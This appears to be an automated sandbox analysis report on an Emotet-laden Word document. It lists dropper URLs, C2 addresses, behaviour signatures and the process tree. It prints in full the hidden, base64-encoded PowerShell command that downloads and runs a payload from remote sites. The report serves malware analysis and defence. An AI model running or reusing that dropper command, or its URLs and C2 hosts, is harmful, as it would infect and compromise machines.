Analysis

  • max time kernel
    28s
  • resource
    win10v191014
  • submitted
    20-12-2019 17:41

General

  • Target

    115088a6fc23e09b797f8256fd67ee60eae48df940103b7607f7d171523dd47e

  • Sample

    191220-a7zes4m8rs

  • SHA256

    115088a6fc23e09b797f8256fd67ee60eae48df940103b7607f7d171523dd47e

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://peikeshargh.com/wp-admin/HXU15i/

exe.dropper

http://cooklawyerllc.com/DB/XygG68105/

exe.dropper

https://www.meditationmusic.shop/musicshop/MYatxrUp/

exe.dropper

http://magic-in-china.com/wovltk23ld/f9aH1153/

exe.dropper

http://www.ikedi.info/wp-content/x4f7893/

Extracted

Family

emotet

C2

177.180.115.224:80

177.242.21.126:80

190.210.236.139:80

144.217.117.207:8080

96.126.121.64:443

104.236.137.72:8080

85.234.143.94:8080

5.88.27.67:8080

37.187.6.63:8080

186.15.83.52:8080

201.213.32.59:80

97.81.12.153:80

178.79.163.131:8080

138.68.106.4:7080

217.199.160.224:8080

181.61.143.177:80

189.19.81.181:443

186.68.48.204:443

118.36.70.245:80

80.11.158.65:8080

rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\115088a6fc23e09b797f8256fd67ee60eae48df940103b7607f7d171523dd47e.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:5004
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABZAHQAbgBwAHAAbwBjAHoAPQAnAEwAegBnAGwAbwBvAHoAdwBjACcAOwAkAFgAegB0AGMAdQBtAHoAdgBhACAAPQAgACcANwA3ADMAJwA7ACQASwB6AGQAawB4AGcAagBxAHMAPQAnAEEAZwBmAHEAYwBiAGgAZABmACcAOwAkAEUAegBlAHMAcQB3AGcAZgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWAB6AHQAYwB1AG0AegB2AGEAKwAnAC4AZQB4AGUAJwA7ACQATAB6AG4AcQBnAHgAegB5AHkAagBuAHEAagA9ACcARQByAHcAcQBiAG0AZwB1AGYAZgAnADsAJABSAGkAegBkAHMAcQBpAGsAdAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwBiACcAKwAnAGoAZQBjAHQAJwApACAATgBFAHQALgBXAGUAQgBjAGwASQBlAE4AVAA7ACQARQB1AGkAdAByAGoAaABxAG8AcwByAD0AJwBoAHQAdABwADoALwAvAHAAZQBpAGsAZQBzAGgAYQByAGcAaAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ASABYAFUAMQA1AGkALwAqAGgAdAB0AHAAOgAvAC8AYwBvAG8AawBsAGEAdwB5AGUAcgBsAGwAYwAuAGMAbwBtAC8ARABCAC8AWAB5AGcARwA2ADgAMQAwADUALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AZQBkAGkAdABhAHQAaQBvAG4AbQB1AHMAaQBjAC4AcwBoAG8AcAAvAG0AdQBzAGkAYwBzAGgAbwBwAC8ATQBZAGEAdAB4AHIAVQBwAC8AKgBoAHQAdABwADoALwAvAG0AYQBnAGkAYwAtAGkAbgAtAGMAaABpAG4AYQAuAGMAbwBtAC8AdwBvAHYAbAB0AGsAMgAzAGwAZAAvAGYAOQBhAEgAMQAxADUAMwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGkAawBlAGQAaQAuAGkAbgBmAG8ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AeAA0AGYANwA4ADkAMwAvACcALgAiAHMAcABsAGAASQB0ACIAKAAnACoAJwApADsAJABYAHYAdQBxAGgAcABsAG4AZAB4AGcAYQBsAD0AJwBHAHcAbQBxAHcAYgBwAHcAcQBoAG8AcQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQByAHMAbwB3AGQAZQB6AGIAdgBxAG8AZgAgAGkAbgAgACQARQB1AGkAdAByAGoAaABxAG8AcwByACkAewB0AHIAeQB7ACQAUgBpAHoAZABzAHEAaQBrAHQALgAiAEQAYABPAFcAYABOAEwAYABvAGEAZABmAGkAbABFACIAKAAkAEEAcgBzAG8AdwBkAGUAegBiAHYAcQBvAGYALAAgACQARQB6AGUAcwBxAHcAZwBmACkAOwAkAEYAaABsAHgAegBjAGQAZQBzAD0AJwBZAGIAaQBnAGsAdgBlAGsAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABFAHoAZQBzAHEAdwBnAGYAKQAuACIAbABgAEUAbgBHAHQASAAiACAALQBnAGUAIAAzADMAOAAzADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AGAAQQByAHQAIgAoACQARQB6AGUAcwBxAHcAZwBmACkAOwAkAFQAbwBtAHcAaAB5AGUAagBzAHoAeQBpAHkAPQAnAEQAbQBvAHEAYgBkAGcAcAB5AHoAaABwACcAOwBiAHIAZQBhAGsAOwAkAEoAZwB1AGUAaQBvAHcAawBjAHUAPQAnAEoAbgBiAHoAcwBrAHEAcAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABWAGIAeQB0AG4AeQBuAHcAYQBpAHgAeAA9ACcARABlAHAAYgB5AHMAawB1AG0AYgB1AHMAJwA=
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4696
    • C:\Users\Admin\773.exe
      "C:\Users\Admin\773.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4784
      • C:\Users\Admin\773.exe
        --5a8e9ad1
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EmotetMutantsSpam
        PID:4452

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\773.exe

  • C:\Users\Admin\773.exe

  • C:\Users\Admin\773.exe

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438

  • memory/4452-13-0x00000000007E0000-0x00000000007F7000-memory.dmp

    Filesize

    92KB

  • memory/4452-14-0x0000000000400000-0x00000000004AA000-memory.dmp

    Filesize

    680KB

  • memory/4784-10-0x0000000002250000-0x0000000002267000-memory.dmp

    Filesize

    92KB

  • memory/5004-2-0x0000017F7B1AD000-0x0000017F7B1B0000-memory.dmp

    Filesize

    12KB